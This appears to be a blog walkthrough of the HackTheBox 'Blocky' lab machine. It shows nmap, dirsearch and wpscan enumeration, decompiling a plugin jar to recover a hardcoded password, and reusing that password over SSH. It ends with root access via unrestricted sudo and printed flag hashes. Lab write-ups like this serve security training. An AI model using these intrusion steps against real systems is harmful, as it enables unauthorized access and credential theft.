文章归档

置顶文章

Web安全

Web安全基础

PHP相关

Writeups

靶机系列

HackTheBox

VulnHub

代码审计

PHP代码审计

流量分析

机器学习

基础学习

Python

Python编程

Java

Java编程

算法

Leetcode

随笔

经验

技术

 2020-04-07   1.1k

HTB::Blocky Walkthrough

0x01 Info Card

0x02 Tools and Tips

  • nmap
  • dirsearch
  • wpscan
  • jad

0x03 Pentesting

Initial Enumeration

nmap scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 10:54 CET
Nmap scan report for 10.10.10.37
Host is up (0.085s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.8
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds

dirsearch scan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ ./dirsearch.py -u 10.10.10.37 -e * 
[08:44:06] 301 - 0B - /index.php -> http://10.10.10.37/
[08:44:09] 301 - 315B - /javascript -> http://10.10.10.37/javascript/
[08:44:13] 200 - 19KB - /license.txt
[08:44:37] 301 - 315B - /phpmyadmin -> http://10.10.10.37/phpmyadmin/
[08:44:41] 200 - 10KB - /phpmyadmin/
[08:44:42] 301 - 312B - /plugins -> http://10.10.10.37/plugins/
[08:44:46] 200 - 7KB - /readme.html
[08:44:52] 403 - 299B - /server-status
[08:44:52] 403 - 300B - /server-status/
[08:45:21] 200 - 380B - /wiki/
[08:45:21] 301 - 313B - /wp-admin -> http://10.10.10.37/wp-admin/
[08:45:21] 301 - 309B - /wiki -> http://10.10.10.37/wiki/
[08:45:21] 302 - 0B - /wp-admin/ -> http://10.10.10.37/wp-login.php?redirect_to=http%3A%2F%2F10.10.10.37%2Fwp-admin%2F&reauth=1
[08:45:22] 200 - 1KB - /wp-admin/install.php
[08:45:22] 500 - 4KB - /wp-admin/setup-config.php
[08:45:22] 200 - 0B - /wp-content/
[08:45:22] 301 - 315B - /wp-content -> http://10.10.10.37/wp-content/
[08:45:23] 200 - 69B - /wp-content/plugins/akismet/akismet.php
[08:45:23] 200 - 965B - /wp-content/uploads/
[08:45:23] 301 - 316B - /wp-includes -> http://10.10.10.37/wp-includes/
[08:45:23] 500 - 0B - /wp-includes/rss-functions.php
[08:45:23] 200 - 2KB - /wp-login.php
[08:45:23] 200 - 40KB - /wp-includes/
[08:45:24] 405 - 42B - /xmlrpc.php

Task Completed

wpscan

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
[i] User(s) Identified:

[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] Notch
| Found By: Rss Generator (Passive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 47

Getting User Access

Visit http://10.10.10.37/plugin

Download and extract BlockyCore.jar, once the BlockCore.class is extracted we need to do to print out it’s contents is to use the jad command.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
$ jad BlockyCore.class
Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
Generating BlockyCore.jad

$ cat BlockyCore.jad
// Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
// Jad home page: http://www.geocities.com/kpdus/jad.html
// Decompiler options: packimports(3)
// Source File Name: BlockyCore.java
package com.myfirstplugin;
public class BlockyCore
{
public BlockyCore()
{
sqlHost = "localhost";
sqlUser = "root";
sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
}

public void onServerStart()
{
}

public void onServerStop()
{
}

public void onPlayerJoin()
{
sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
}

public void sendMessage(String s, String s1)
{
}

public String sqlHost;
public String sqlUser;
public String sqlPass;
}

Get the credentials: notch : 8YsqfCTnvxAUeduzjNSXe22

SSH with notch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ ssh [email protected]
[email protected]'s password: Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

7 packages can be updated.
7 updates are security updates.


Last login: Tue Jul 25 11:14:53 2017 from 10.10.14.230
[email protected]:~$ id
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
[email protected]:~$ ls
minecraft user.txt
[email protected]:~$ cat user.txt
59fee0977fb60b8a0bc6e41e751f3cd5

Getting Root Access

1
2
3
4
5
6
7
8
9
10
11
12
13
14
[email protected]:~$ cat .bash_history 
sudo su
cat .bash_history
echo "" > .bash_history
exit
poweroff
sudo poweroff
[email protected]:~$ sudo -l
[sudo] password for notch:
Matching Defaults entries for notch on Blocky:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User notch may run the following commands on Blocky:
(ALL : ALL) ALL

Get root flag

1
2
3
4
[email protected]:~$ cat /root/root.txt
cat: /root/root.txt: Permission denied
[email protected]:~$ sudo su
[email protected]:/home/notch# cat /root/root.txt

0x04 Conclusion

0x05 Reference

https://ech1.netlify.com/htb/easy/1

Copyright © ca01h 2019-2020 | 本站总访问量